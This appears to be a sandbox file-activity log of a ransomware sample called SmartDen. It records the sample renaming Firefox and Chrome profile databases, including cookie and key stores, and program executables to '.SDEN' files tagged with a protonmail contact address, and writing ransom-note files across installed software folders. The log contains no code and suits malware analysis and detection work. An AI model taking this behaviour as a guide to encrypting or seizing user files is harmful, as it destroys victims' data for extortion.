| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_highcontrast.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Default\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\!SDEN_INFO!.rtf | type = file_attributes |
|
3 | |
| Get Info | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\browser\extensions\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\browser\features\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\browser\VisualElements\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\dictionaries\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\!SDEN_INFO!.rtf | type = file_attributes |
|
6 | |
| Get Info | C:\Program Files\Mozilla Firefox\browser\features\!SDEN_INFO!.rtf | type = file_attributes |
|
4 | |
| Get Info | C:\Program Files\Mozilla Firefox\browser\VisualElements\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\defaults\pref\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\uninstall\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\browser\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\dictionaries\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\browser\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\fonts\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\uninstall\!SDEN_INFO!.rtf | type = file_attributes |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].ARjNZbc3-GGbNn6zv.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].nimdT47p-Yg4RLd31.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Default\[SmartDen@protonmail.com].Oac3gwWu-8TPUfdDz.SDEN | source_filename = C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].JwLc3hbG-YymU2jWD.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].IO6lkAGR-vhVtaX5g.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].hRGfoawo-BWJxkV8y.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].E1QApuoi-kYHYmOxg.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\[SmartDen@protonmail.com].3pXdQcOs-NtRlGDXw.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].Oh5RMS8D-LGHAzhUJ.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].vmisbKVh-fSSORhCn.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\[SmartDen@protonmail.com].eYrW8237-5swaPtXf.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\[SmartDen@protonmail.com].DT3uRw5l-f9GPP0Mo.SDEN | source_filename = C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].m3To8Mcj-b7rFzOOP.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\[SmartDen@protonmail.com].7UBd1vBV-gSmzi2Nf.SDEN | source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\browser\features\[SmartDen@protonmail.com].tnLD0Ums-dw53kw0c.SDEN | source_filename = C:\Program Files\Mozilla Firefox\browser\features\clicktoplay-rollout@mozilla.org.xpi, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\browser\features\[SmartDen@protonmail.com].uoTDTwi8-bplCSj2O.SDEN | source_filename = C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\dictionaries\[SmartDen@protonmail.com].ALHMhbUP-cA6lwcFV.SDEN | source_filename = C:\Program Files\Mozilla Firefox\dictionaries\en-US.aff, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\[SmartDen@protonmail.com].ovZbR8nH-Pg0LSe1V.SDEN | source_filename = C:\Program Files\Mozilla Firefox\crashreporter.exe, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\browser\VisualElements\[SmartDen@protonmail.com].qchR0lnd-Qjvukgdi.SDEN | source_filename = C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\dictionaries\[SmartDen@protonmail.com].A1o7q7mI-26TiEUt8.SDEN | source_filename = C:\Program Files\Mozilla Firefox\dictionaries\en-US.dic, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\[SmartDen@protonmail.com].x1LEmnTI-r6AF6W2A.SDEN | source_filename = C:\Program Files\Mozilla Firefox\pingsender.exe, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\[SmartDen@protonmail.com].ElYCPZXW-6PRCh0ho.SDEN | source_filename = C:\Program Files\Mozilla Firefox\updater.exe, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\browser\[SmartDen@protonmail.com].fHwMDwO0-TJOjSJnJ.SDEN | source_filename = C:\Program Files\Mozilla Firefox\browser\omni.ja, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\fonts\[SmartDen@protonmail.com].z3p9tRB4-1Whp18RV.SDEN | source_filename = C:\Program Files\Mozilla Firefox\fonts\EmojiOneMozilla.ttf, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\[SmartDen@protonmail.com].ligHdZrs-yCBRri6y.SDEN | source_filename = C:\Program Files\Mozilla Firefox\plugin-container.exe, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\[SmartDen@protonmail.com].F5Q515IO-icIt0QgH.SDEN | source_filename = C:\Program Files\Mozilla Firefox\application.ini, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\browser\features\[SmartDen@protonmail.com].DVJuLQiO-s55AZPjc.SDEN | source_filename = C:\Program Files\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\[SmartDen@protonmail.com].xBQoSHEY-JNZ47EzI.SDEN | source_filename = C:\Program Files\Mozilla Firefox\firefox.exe, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\[SmartDen@protonmail.com].jvYTwB0B-khP0hvZH.SDEN | source_filename = C:\Program Files\Mozilla Firefox\platform.ini, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Move | C:\Program Files\Mozilla Firefox\[SmartDen@protonmail.com].OeEpEXqR-OwIUOxMJ.SDEN | source_filename = C:\Program Files\Mozilla Firefox\updater.ini, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Picture2_80.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Picture2_80.jpg | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\jjs.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\jjs.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\rmiregistry.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\rmiregistry.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\61.0.3163.79\Installer\chrome.7z | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\61.0.3163.79\Installer\chrome.7z | size = 61440 |
|
136 | |
